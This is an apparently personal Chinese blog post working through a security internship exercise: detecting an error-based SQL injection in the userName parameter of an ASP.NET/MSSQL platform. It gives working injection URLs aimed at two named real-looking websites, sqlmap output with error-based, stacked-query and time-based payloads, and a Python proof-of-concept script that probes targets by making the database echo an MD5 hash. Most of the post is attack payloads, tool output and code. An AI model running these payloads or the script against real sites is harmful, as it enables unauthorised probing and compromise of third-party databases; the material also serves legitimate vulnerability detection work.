最近四叶草又开始招收实习了,所以某个妹子就投了简历。不久四叶草发来一个题目要妹子完成。So?这意味着什么,这意味着一个泡妹子的好时机来了啊。哈哈哈……

下面就让我们看看这个题目:

某通用平台被曝出有一处高危注入,以下为详情:

1
http://www.exploit.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1

userName处为一处报错注入,

请使用python编写一个通用脚本检测该处注入点(可使用任何python库),
要求测试该脚本必须使用多个目标站点。
以下为两个测试站点(请勿做除测试之外的任何危险动作)

1
2
http://www.jmsyzx.com/
http://www.globechildren.com/

哎呦,不限制python库,一个通用脚本。刚跟室友开黑了一下守望先锋(挺好玩儿的,有兴趣一起啊)的我刚看也是一脸懵逼,总之刚开始想的太多了,但其实也就是一个插件的事情(还是range一棒打醒我,所以以后还是干完正事再开黑)。

看了一下是mssql数据库,并且是报错注入。我们可以手工构造看数据库类型:

1
http://www.jmsyzx.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=@@version--

也可以sqlmap跑一下看看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[22:07:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:07:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1' AND 2390=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2390=2390) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113))) AND 'nTAv'='nTAv
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1' WAITFOR DELAY '0:0:5'--
---
[22:07:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[22:07:33] [INFO] fetched data logged to text files under 'C:\Users\ZEROYU\.sqlmap\output\www.jmsyzx.com'

别多看看那个GET就行了,GET最简单了。
我们就抓住报错跟打印MD5这两点就行了。

打印MD5呢,mssql有两种方式:

1
2
3
1.http://www.jmsyzx.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27123456%27))--
2.http://www.jmsyzx.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--

直接上我写的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
"""
POC Name : 泡妹专享
Author : zeroyu
mail : zeroyu.xyz@gmail.com
"""
import hackhttp
import time
def assign(service, arg):
if service == 'fingerprint.girl':
return True, arg
def audit(arg):
payload = "/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
url = arg + payload
code, head, res, errcode, _ = hackhttp.http(url)
time.sleep(1)
if code == 500 and '81dc9bdb52d04dc20036dbd8313ed055' in res:
security_hole(url)
if __name__=='__main__':
from dummy import *
audit(assign('fingerprint.girl','http://www.jmsyzx.com/')[1])

是不是想问我hackhttp是个什么库,看文档去。

好,今天妹子就泡到这儿。